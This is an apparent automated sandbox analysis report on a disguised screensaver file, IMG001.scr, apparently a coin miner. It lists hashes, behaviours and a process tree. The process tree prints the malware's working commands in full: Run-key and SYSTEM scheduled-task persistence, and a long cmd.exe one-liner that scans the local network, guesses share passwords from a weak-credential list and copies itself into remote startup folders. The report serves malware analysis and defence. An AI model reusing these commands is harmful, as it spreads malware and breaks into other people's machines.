Analysis
- max time kernel: 147s
- max time network: 155s
- platform: windows10-2004_x64
- resource: win10v2004-20230703-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 04-08-2023 08:19
Static task: static1
Behavioral task: behavioral1
- Sample: IMG001.scr
- Resource: win7-20230712-en
Behavioral task: behavioral2
- Sample: IMG001.scr
- Resource: win10v2004-20230703-en
General
- Target: IMG001.scr
- Size: 3.4MB
- MD5: fbbcf1e9501234d6661a0c9ae6dc01c9
- SHA1: 1ca9759a324159f331e79ea6871ad62040521b41
- SHA256: d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
- SHA512: 027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140
- SSDEEP: 98304:M5VPnq1y5tQOM33ZNqCtBixHl54Oyjes1Ro6:2VPq1yLanrqTr43eON
Signatures
Drops startup file (1 IoC)
Processes:
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk (IMG001.exe)
Executes dropped EXE (1 IoC)
Processes:
- PID 1616: IMG001.exe
Loads dropped DLL (5 IoCs)
Processes:
- PID 1616: IMG001.exe (reported 5 times)
Adds Run key to start application (2 TTPs, 2 IoCs)
Processes:
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" (reg.exe)
- Set value (str): \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" (IMG001.exe)
Enumerates connected drives (3 TTPs, 1 IoC)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
- File opened (read-only): \??\E: (IMG001.exe)
Drops file in Windows directory (1 IoC)
Processes:
- File created: C:\Windows\Tasks\UAC.job (schtasks.exe)
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
NSIS installer (6 IoCs)
Processes:
- yara_rule nsis_installer_1: C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe (matched 3 times)
- yara_rule nsis_installer_2: C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe (matched 3 times)
Creates scheduled task(s) (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
- PID 4780: schtasks.exe
- PID 4512: schtasks.exe
Discovers systems in the same network (1 TTP, 2 IoCs)
Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes:
- Token SeShutdownPrivilege: PID 4888 (powercfg.exe)
- Token SeCreatePagefilePrivilege: PID 4888 (powercfg.exe)
- Token SeShutdownPrivilege: PID 3904 (powercfg.exe)
- Token SeCreatePagefilePrivilege: PID 3904 (powercfg.exe)
- Token SeShutdownPrivilege: PID 1684 (powercfg.exe)
- Token SeCreatePagefilePrivilege: PID 1684 (powercfg.exe)
Suspicious use of WriteProcessMemory (63 IoCs)
Processes (each parent/target pair appears three times in the report; 21 distinct pairs):
- PID 2892 (IMG001.scr) wrote to memory of PID 1616 (IMG001.exe)
- PID 1616 (IMG001.exe) wrote to memory of PID 4140 (cmd.exe)
- PID 1616 (IMG001.exe) wrote to memory of PID 2476 (cmd.exe)
- PID 1616 (IMG001.exe) wrote to memory of PID 4320 (cmd.exe)
- PID 1616 (IMG001.exe) wrote to memory of PID 3764 (cmd.exe)
- PID 4140 (cmd.exe) wrote to memory of PID 1656 (reg.exe)
- PID 3764 (cmd.exe) wrote to memory of PID 4888 (powercfg.exe)
- PID 2476 (cmd.exe) wrote to memory of PID 4780 (schtasks.exe)
- PID 4320 (cmd.exe) wrote to memory of PID 4512 (schtasks.exe)
- PID 3764 (cmd.exe) wrote to memory of PID 3904 (powercfg.exe)
- PID 3764 (cmd.exe) wrote to memory of PID 1684 (powercfg.exe)
- PID 1616 (IMG001.exe) wrote to memory of PID 3040 (cmd.exe)
- PID 3040 (cmd.exe) wrote to memory of PID 1268 (cmd.exe)
- PID 1268 (cmd.exe) wrote to memory of PID 948 (net.exe)
- PID 1268 (cmd.exe) wrote to memory of PID 3616 (find.exe)
- PID 1268 (cmd.exe) wrote to memory of PID 3448 (ARP.EXE)
- PID 1268 (cmd.exe) wrote to memory of PID 3036 (find.exe)
- PID 3040 (cmd.exe) wrote to memory of PID 2208 (cmd.exe)
- PID 3040 (cmd.exe) wrote to memory of PID 3660 (cmd.exe)
- PID 3660 (cmd.exe) wrote to memory of PID 660 (net.exe)
- PID 3660 (cmd.exe) wrote to memory of PID 764 (find.exe)
Processes
- C:\Users\Admin\AppData\Local\Temp\IMG001.scr (PID 2892)
  Command: "C:\Users\Admin\AppData\Local\Temp\IMG001.scr" /S
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe (PID 1616)
    Command: "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
    Signatures: Drops startup file; Executes dropped EXE; Loads dropped DLL; Adds Run key to start application; Enumerates connected drives; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe (PID 4140)
      Command: "C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\reg.exe (PID 1656)
        Command: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        Signatures: Adds Run key to start application
    - C:\Windows\SysWOW64\cmd.exe (PID 2476)
      Command: "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\schtasks.exe (PID 4780)
        Command: schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        Signatures: Creates scheduled task(s)
    - C:\Windows\SysWOW64\cmd.exe (PID 3764)
      Command: "C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\powercfg.exe (PID 4888)
        Command: powercfg /CHANGE -standby-timeout-ac 0
        Signatures: Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\powercfg.exe (PID 3904)
        Command: powercfg /CHANGE -hibernate-timeout-ac 0
        Signatures: Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\powercfg.exe (PID 1684)
        Command: Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\cmd.exe (PID 4320)
      Command: "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\schtasks.exe (PID 4512)
        Command: schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        Signatures: Drops file in Windows directory; Creates scheduled task(s)
    - C:\Windows\SysWOW64\cmd.exe (PID 3040)
      Command: "C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ПК=!& set f=IMG001.exe& set n=1806& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin администратор) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Главное меню\Программы\Автозагрузка\!f!" "%c\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe (PID 1268)
        Command: C:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\net.exe (PID 948)
          Command: net view
          Signatures: Discovers systems in the same network
        - C:\Windows\SysWOW64\find.exe (PID 3616)
          Command: find /i "\\"
        - C:\Windows\SysWOW64\ARP.EXE (PID 3448)
          Command: arp -a
        - C:\Windows\SysWOW64\find.exe (PID 3036)
          Command: find /i " 1"
      - C:\Windows\SysWOW64\cmd.exe (PID 2208)
        Command: C:\Windows\system32\cmd.exe /c set str_
      - C:\Windows\SysWOW64\cmd.exe (PID 3660)
        Command: C:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\net.exe (PID 660)
          Command: net view \\10.127.0.1
          Signatures: Discovers systems in the same network
        - C:\Windows\SysWOW64\find.exe (PID 764)
          Command: find /i " "
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Downloads